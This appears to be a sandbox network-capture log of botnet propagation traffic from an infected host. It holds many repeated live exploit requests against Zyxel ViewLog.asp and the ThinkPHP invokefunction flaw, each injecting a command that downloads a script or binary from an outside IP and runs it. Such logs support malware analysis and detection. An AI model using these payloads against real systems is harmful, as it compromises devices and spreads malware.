                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      111192.168.2.155996894.136.146.2308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.797727108 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      112192.168.2.153860231.200.89.718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.806840897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      113192.168.2.153564894.123.61.2098080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.836155891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:10.938668966 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:17.082585096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:29.114276886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.201436043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.352257967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      114192.168.2.154298894.110.186.108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:06.855119944 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      115192.168.2.154384462.219.113.638080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:07.040513992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      116192.168.2.154550694.120.238.88080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:07.542685032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      117192.168.2.154229894.123.60.548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:07.542778969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      118192.168.2.153395694.123.18.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:07.543037891 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      119192.168.2.153965694.122.31.818080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:07.544389963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      120192.168.2.154300495.100.105.18980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:08.720880032 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:08.937550068 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:08 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 64 37 39 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 38 26 23 34 36 3b 35 66 39 62 63 65 31 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3d79dd58&#46;1707899348&#46;5f9bce1d</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      121192.168.2.154353295.181.203.4480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:08.750036955 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:08.995486021 CET337INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.14.1
                                                      Date: Wed, 14 Feb 2024 08:29:08 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 173
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      122192.168.2.155891695.153.253.4580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:08.781543016 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:09.071739912 CET62INHTTP/1.0 400 Bad Request
                                                      Connection: Keep-Alive
                                                      Feb 14, 2024 09:29:09.071752071 CET83INData Raw: 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                      Data Ascii: Keep-Alive: timeout=20Content-Type: text/html<h1>Bad Request</h1>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      123192.168.2.155246495.101.116.4880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:08.916682005 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      124192.168.2.155709495.49.0.20880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:08.989994049 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:09.229943037 CET330INHTTP/1.0 400 Bad Request
                                                      Cache-Control: no-store
                                                      Connection: close
                                                      Content-Length: 129
                                                      Date: Wed, 14 Feb 2024 08:29:09 GMT
                                                      Expires: 0
                                                      Pragma: no-cache
                                                      X-Frame-Options: sameorigin
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!doctype html><html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      125192.168.2.155227495.57.108.5180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:09.207734108 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:09.499269009 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:29:09.499362946 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      126192.168.2.154238495.100.251.10780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:09.708497047 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:09.916337013 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:09 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:09 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 31 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 39 26 23 34 36 3b 31 61 66 36 36 63 64 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;517e19b8&#46;1707899349&#46;1af66cd0</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      127192.168.2.155896495.79.101.5480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:09.728993893 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:09.964608908 CET317INHTTP/1.1 400 Bad Request
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:28:53 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 155
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      128192.168.2.154232094.177.135.398080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:10.028311968 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:11.066663980 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:11.260529995 CET1286INHTTP/1.0 400 Bad Request
                                                      Server: squid/3.1.9
                                                      Mime-Version: 1.0
                                                      Date: Tue, 06 Apr 2021 05:24:28 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 3161
                                                      X-Squid-Error: ERR_INVALID_URL 0
